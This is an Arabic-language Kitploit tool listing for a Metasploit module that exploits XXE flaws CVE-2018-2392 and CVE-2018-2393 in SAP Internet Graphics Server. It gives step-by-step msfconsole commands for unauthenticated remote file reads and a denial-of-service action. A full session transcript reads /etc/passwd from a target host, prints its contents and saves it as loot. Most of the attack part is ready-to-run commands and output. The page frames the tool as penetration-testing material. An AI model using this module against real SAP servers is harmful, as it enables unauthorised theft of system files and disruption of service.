Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
sap_igs_xxe — هجوم XXE على SAP IGS CVE-2018-2392 وCVE-2018-2393 | Kitploit
أدوات/GitHubGitHub/vladimir-ivanov-git/sap_igs_xxe
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubvladimir-ivanov-git/sap_igs_xxe

sap_igs_xxe

هجوم XXE على SAP IGS CVE-2018-2392 وCVE-2018-2393

عرض المستودع
1منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

هجوم SAP IGS XXE CVE-2018-2392 و CVE-2018-2393

هذه الوحدة في Metasploit Framework

التوثيق

الوحدة

التطبيق المعرض للخطر

تستغل هذه الوحدة الثغرتين CVE-2018-2392 و CVE-2018-2393، وهما ثغرتان من نوع XXE داخل صفحة XMLCHART في خوادم SAP Internet Graphics Servers (IGS) التي تعمل بالإصدارات 7.20 أو 7.20EXT أو 7.45 أو 7.49 أو 7.53. وتحدث هاتان الثغرتان نتيجة لغياب التحقق المناسب من وسم Extension HTML عند إرسال طلب POST إلى صفحة XMLCHART لإنشاء مخطط جديد.

سيسمح الاستغلال الناجح للمهاجمين عن بُعد غير المصادق عليهم بقراءة الملفات من الخادم بصلاحية المستخدم الذي يتم تشغيل خدمة IGS به، والذي يكون عادةً مستخدم إدارة SAP. وبدلاً من ذلك، يمكن للمهاجمين أيضًا إساءة استخدام ثغرة XXE لشن هجوم حجب الخدمة (Denial of Service) ضد خادم SAP IGS المعرض للخطر.

خلفية التطبيق

توفّر خدمة الرسومات عبر الإنترنت (IGS) بنية تحتية تتيح للمطوّرين عرض الرسومات في متصفح الإنترنت بأقل جهد ممكن. وقد تم دمجها في العديد من تقنيات واجهات مستخدم SAP المختلفة، حيث توفر وسيلة للاستفادة من البيانات القادمة من نظام SAP آخر أو مصدر بيانات آخر لتوليد مخرجات رسومية أو غير رسومية ديناميكية.

خطوات التثبيت

يمكن العثور على خطوات تثبيت خادم SAP IGS وتحديثه عبر الإنترنت على هذه الصفحة. يمكن العثور على معلومات إضافية حول تكوين خادم IGS هنا. وأخيرًا، يمكن العثور على معلومات حول إدارة خادم IGS هنا.

بمجرد الإعداد والتكوين، ستكون النسخ معرضة للخطر على منفذ HTTP الافتراضي 40080.

خطوات التحقق

  1. ابدأ تشغيل msfconsole
  2. نفّذ: workspace [WORKSPACE]
  3. نفّذ: use auxiliary/admin/sap/sap_igs_xmlchart_xxe
  4. نفّذ: set RHOSTS [IP]
  5. نفّذ: set FILE [remote file name]
  6. نفّذ: set action READ
  7. نفّذ: check
  8. تحقق من أن طريقة check تحدد بشكل صحيح ما إذا كان الهدف معرضًا للخطر أم لا.
  9. نفّذ: run
  10. تحقق من إرجاع محتويات الملف الذي حددته.

الخيارات

FILE

الملف المراد قراءته من الخادم البعيد. مثال: /etc/passwd

URIPATH

هذا هو المسار إلى صفحة XMLCHART الخاصة بخادم SAP IGS المعرضة لثغرة XXE. افتراضيًا يتم تعيينه إلى /XMLCHART، ومع ذلك يمكن تغييره إذا تم تثبيت خادم SAP IGS في مسار مختلف عن جذر الويب. على سبيل المثال إذا تم تثبيت خادم SAP IGS في المسار /igs/ تحت جذر الويب، فسيتم تعيين هذه القيمة إلى /igs/XMLCHART.

الإجراءات

root@kitploit:~
   Name  Description
   ----  -----------
   READ  Remote file read
   DOS   Denial Of Service

السيناريوهات

إصدار SAP IGS المعرض للخطر: 7.45 يعمل على SUSE Linux Enterprise Server for SAP Applications 12 SP1

root@kitploit:~
msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set RHOSTS 172.16.30.29
RHOSTS => 172.16.30.29
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set action READ
action => READ
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > options

Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FILE     /etc/passwd          no        File to read from the remote server
   Proxies  http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.16.30.29         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    40080                yes       The target port (TCP)
   SSL      false                no        Negotiate SSL/TLS for outgoing connections
   URIPATH  /XMLCHART            yes       Path to the SAP IGS XMLCHART page from the web root
   VHOST                         no        HTTP server virtual host


Auxiliary action:

   Name  Description
   ----  -----------
   READ  Remote file read


msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > check
[+] 172.16.30.29:40080 - The target is vulnerable. 172.16.30.29 running OS: SUSE Linux Enterprise Server for SAP Applications 12 SP1 returned a response indicating that its XMLCHART page is vulnerable to XXE!
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > run
[*] Running module against 172.16.30.29

[+] File: /etc/passwd content from host: 172.16.30.29
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:108:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:104:107:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:105:109:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
puppet:x:103:106:Puppet daemon:/var/lib/puppet:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
admin:x:1000:100:admin:/home/admin:/bin/bash
j45adm:x:1001:1001:SAP System Administrator:/home/j45adm:/bin/csh
sybj45:x:1002:1001:SAP Database Administrator:/sybase/J45:/bin/csh
sapadm:x:1003:1001:SAP System Administrator:/home/sapadm:/bin/false
[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > services
Services
========

host          port   proto  name  state  info
----          ----   -----  ----  -----  ----
172.16.30.29  40080  tcp    http  open   SAP Internet Graphics Server (IGS)

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > vulns

Vulnerabilities
===============

Timestamp                Host          Name                                             References
---------                ----          ----                                             ----------
2020-10-07 10:12:37 UTC  172.16.30.29  SAP Internet Graphics Server (IGS) XMLCHART XXE  CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > loot

Loot
====

host          service  type              name         content     info                  path
----          -------  ----              ----         -------     ----                  ----
172.16.30.29           igs.xmlchart.xxe  /etc/passwd  text/plain  SAP IGS XMLCHART XXE  /Users/vladimir/.msf4/loot/01619fd331da98b5ac4d-20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt

طلب فحص HTTP في Burp

طلب فحص HTTP في Burp

طلب HTTP الأول للحصول على ملف /etc/passwd البعيد في Burp

طلب HTTP الأول للحصول على ملف /etc/passwd البعيد في Burp

طلب HTTP الثاني للحصول على ملف /etc/passwd البعيد في Burp

طلب HTTP الثاني للحصول على ملف /etc/passwd البعيد في Burp

فيديو تجريبي

فيديو تجريبي

تنزيل الأداة